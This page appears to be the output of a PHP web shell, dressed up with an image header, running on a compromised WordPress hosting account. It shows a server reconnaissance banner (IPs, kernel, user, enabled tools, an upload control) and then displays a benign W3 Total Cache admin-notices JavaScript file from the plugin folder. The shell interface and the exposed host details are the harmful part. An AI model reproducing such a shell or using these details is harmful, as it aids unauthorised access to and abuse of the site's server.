????JFIF??x?x????'
Server IP : 104.21.80.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/pontiacques.org/wp-content/plugins/w3-total-cache/ |
Upload File : |
/** * File: Generic_Plugin_AdminNotices.js * * JavaScript for W3TC Admin Notices. * * Array W3tcNoticeData { * bool isW3tcPage Is on a W3TC page. * string w3tc_nonce Nonce. * } * * @since 2.7.5 */ jQuery(document).ready(function($) { $.get( ajaxurl, { action: 'w3tc_ajax', _wpnonce: W3tcNoticeData.w3tc_nonce, w3tc_action: 'get_notices' }, function(response) { if (response.success) { const noticeData = response.data.noticeData; if (noticeData.length > 0) { noticeData.forEach( function(notice) { // Check if the notice is global or for only W3TC pages. if (! W3tcNoticeData.isW3tcPage && ! notice.is_global) { return; } const $noticeContent = $(notice.content); if ($('#w3tc-top-nav-bar').length) { $('#w3tc-top-nav-bar').after($noticeContent); } else { $('#wpbody-content').prepend($noticeContent); } // Manually initialize the dismiss button $noticeContent.on( 'click', '.notice-dismiss', function() { $.post( ajaxurl, { action: 'w3tc_ajax', _wpnonce: W3tcNoticeData.w3tc_nonce, w3tc_action: 'dismiss_notice', notice_id: $noticeContent.data('id') } ); $noticeContent.fadeTo( 100, 0, function() { $noticeContent.slideUp( 100, function() { $noticeContent.remove(); } ); } ); } ); } ); } } else { console.log('Error: ', response.data.message); } } ); });